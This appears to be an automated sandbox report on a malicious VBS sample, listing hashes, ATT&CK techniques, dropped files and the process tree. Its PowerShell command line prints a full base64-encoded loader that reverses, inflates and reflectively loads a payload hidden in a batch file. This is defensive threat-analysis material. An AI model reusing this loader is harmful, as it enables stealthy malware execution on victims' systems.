8bed27f5b5a1f3fee9076396dfa556be72ce444e1b0bf1ee536d716939c3a974

General

Target

8bed27f5b5a1f3fee9076396dfa556be72ce444e1b0bf1ee536d716939c3a974.vbs
Size

506KB
MD5

7fba6758ee02d6fbd69db7bb5de82029
SHA1

7c759c4a7681da6e916d8dd80ecfb125f4bf49f5
SHA256

8bed27f5b5a1f3fee9076396dfa556be72ce444e1b0bf1ee536d716939c3a974
SHA512

15c49c436bf5ed535f646f263e70e80f47de620a553a9f7a8a88482385eec5812970fdc0f69b915efa6006a58b16fbf47980f2fa34f54344cbe77ac28cc75722
SSDEEP

12288:0KaH9AkQqyuC+4MXBRNAIPyLKhaDw7JZJGjdbS4VZZ4Ph:89AkJyd+XXBzAIKOUU7Foxn4p

Score

6^/10

discovery execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

2860 powershell.exe
2252 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
2860	powershell.exe
2252	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

powershell.exepowershell.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

2252 powershell.exe
2860 powershell.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

2252 powershell.exe
2860 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2252 powershell.exe
Token: SeDebugPrivilege 2860 powershell.exe

pid	process
2252	powershell.exe
2860	powershell.exe

pid	process
2252	powershell.exe
2860	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2252	powershell.exe
Token: SeDebugPrivilege	2860	powershell.exe

Suspicious use of WriteProcessMemory 11 IoCs

Processes:

WScript.execmd.exe

description	pid	process	target process
PID 1244 wrote to memory of 2584	1244	WScript.exe	cmd.exe
PID 1244 wrote to memory of 2584	1244	WScript.exe	cmd.exe
PID 1244 wrote to memory of 2584	1244	WScript.exe	cmd.exe
PID 2584 wrote to memory of 2252	2584	cmd.exe	powershell.exe
PID 2584 wrote to memory of 2252	2584	cmd.exe	powershell.exe
PID 2584 wrote to memory of 2252	2584	cmd.exe	powershell.exe
PID 2584 wrote to memory of 2252	2584	cmd.exe	powershell.exe
PID 2584 wrote to memory of 2860	2584	cmd.exe	powershell.exe
PID 2584 wrote to memory of 2860	2584	cmd.exe	powershell.exe
PID 2584 wrote to memory of 2860	2584	cmd.exe	powershell.exe
PID 2584 wrote to memory of 2860	2584	cmd.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8bed27f5b5a1f3fee9076396dfa556be72ce444e1b0bf1ee536d716939c3a974.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1244
- C:\Windows\System32\cmd.exe
  cmd /c ""C:\Users\Admin\rsDymE.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2584
- - C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiRvZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsNCnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCiRlbmNvZGVkQXJyYXkgPSBAKDE1OSwyMjAsMjM4LDIzOCwyMjQsMjMyLDIyMSwyMzEsMjQ0LDE2OSwxOTIsMjMzLDIzOSwyMzcsMjQ0LDIwMywyMzQsMjI4LDIzMywyMzksMTY5LDE5NiwyMzMsMjQxLDIzNCwyMzAsMjI0LDE2MywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NCwxODIpDQokZGVjb2RlZFN0cmluZyA9IENvbnZlcnQtQXNjaWlUb1N0cmluZyAkZW5jb2RlZEFycmF5DQoNCg0KJGZpbGVQYXRoID0gSm9pbi1QYXRoICRlbnY6VXNlclByb2ZpbGUgInJzRHltRS5iYXQiDQokbGFzdExpbmUgPSBHZXQtQ29udGVudCAtUGF0aCAkZmlsZVBhdGggfCBTZWxlY3QtT2JqZWN0IC1MYXN0IDENCiRjbGVhbmVkTGluZSA9ICRsYXN0TGluZSAtcmVwbGFjZSAnXjo6Jw0KJHJldmVyc2UgPSBSZXZlcnNlU3RyaW5nICRjbGVhbmVkTGluZQ0KJGRlY29tcHJlc3NlZEJ5dGUgPSBEZWNvbXByZXNzQnl0ZXMgLWNvbXByZXNzZWREYXRhICRyZXZlcnNlDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KJGFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRkZWNvbXByZXNzZWRCeXRlKQ0KDQpJbnZva2UtRXhwcmVzc2lvbiAkZGVjb2RlZFN0cmluZw0KDQpDbG9zZS1Qcm9jZXNzIC1Qcm9jZXNzTmFtZSAiY21kIg==')) | Out-File -FilePath 'C:\Users\Admin\rsDymE.ps1' -Encoding UTF8"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2252
- - C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\rsDymE.ps1"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2860

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
dcf705a4e509346514961df76af3efa1

SHA1
505677e32c5d31fcf214c3ce8f47389be3952e19

SHA256
70561126b1a5021fb8329be5fb2dbdb1e5e9f7ace6cb26a5dd1f2bd1b73924f1

SHA512
9650d47c09b721d6b38dc033db2ff4b706de67fb0739c25aaafdae4012757b10f02ce10f8a4fc02c298f21055ee9f32cb93bf02cc953bf25c6c5f7ca0ed6990e

Download Submit
C:\Users\Admin\rsDymE.bat

Filesize
488KB

MD5
95e465b1ef996d3968a93ddbf5eba3da

SHA1
60fedee18bb55594ae6cf5a888e3135845ee8b7b

SHA256
0334ee6012ab68c0952a2b92e5977f687c2e278e6c5854554935bf344f6a6fae

SHA512
c6dcb8a2d8e91e8f770278ea20597bbc905387ece940841e5f0317eec117dd772ff8af1ce5fb69e3cfad4a9d0624685d2741d462b1c69a555bf25b1ba774c475

Download Submit
C:\Users\Admin\rsDymE.ps1

Filesize
1KB

MD5
6cc71c25ffb24ada904a5fc8671b08c5

SHA1
cf421c6b8f009a9b50f6c968669b5ae20a8475aa

SHA256
ecc925ef3557e4387d89ce5f16781f13c5c32ab4f30302a29cac1b54356314d0

SHA512
d131952d62403bd65a94e6d4b5231283088e65a7a944ab6fe7b15c81670d003e1003d01749ae89d37e56c8891ef2f1f92b874ced45b97a7a81cc62cc6a55d033

Download Submit
memory/2252-12-0x00000000744B1000-0x00000000744B2000-memory.dmp

Filesize
4KB

Download
memory/2252-13-0x00000000744B0000-0x0000000074A5B000-memory.dmp

Filesize
5.7MB

Download
memory/2252-15-0x00000000744B0000-0x0000000074A5B000-memory.dmp

Filesize
5.7MB

Download
memory/2252-14-0x00000000744B0000-0x0000000074A5B000-memory.dmp

Filesize
5.7MB

Download
memory/2252-16-0x00000000744B0000-0x0000000074A5B000-memory.dmp

Filesize
5.7MB

Download
memory/2252-18-0x00000000744B0000-0x0000000074A5B000-memory.dmp

Filesize
5.7MB

Download

Analysis

Sharing